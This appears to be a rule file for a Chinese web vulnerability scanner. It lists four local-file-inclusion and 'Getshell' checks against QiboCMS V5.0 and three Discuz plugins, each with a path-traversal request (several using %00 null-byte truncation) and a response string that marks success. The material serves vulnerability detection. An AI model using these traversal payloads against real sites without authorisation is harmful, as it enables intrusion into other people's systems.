<zbz>4</zbz>
<bz1>
<name>QiboCMS V5.0 /hr/listperson.php 本地文件包含</name>
<sfjt>get</sfjt>
<demo>/hr/listperson.php?FidTpl[list]=../images/default/default.js</demo>
<expjc>1</expjc>
<zjyz></zjyz>
<xxxz>var evt = (evt) ? evt : ((window.event) ? window.event : "");</xxxz>
</bz1>
<bz2>
<name>Discuz dc_mall插件前台Getshell</name>
<sfjt>get</sfjt>
<demo>/plugin.php?action=../../../../../robots.txt%00&id=dc_mall</demo>
<expjc>1</expjc>
<zjyz></zjyz>
<xxxz>User-agent</xxxz>
</bz2>
<bz3>
<name>Discuz hux_wx.inc.php前台Getshell</name>
<sfjt>get</sfjt>
<demo>/plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=robots.txt%00</demo>
<expjc>1</expjc>
<zjyz></zjyz>
<xxxz>User-agent</xxxz>
</bz3>
<bz4>
<name>Discuz milu_seotool 插件 本地文件包含</name>
<sfjt>get</sfjt>
<demo>/plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00</demo>
<expjc>1</expjc>
<zjyz></zjyz>
<xxxz>User-agent</xxxz>
</bz4>
<bz>专为CMS通杀的 Getshell 漏洞做检测

直接输入 http://网址 即可开始检测</bz>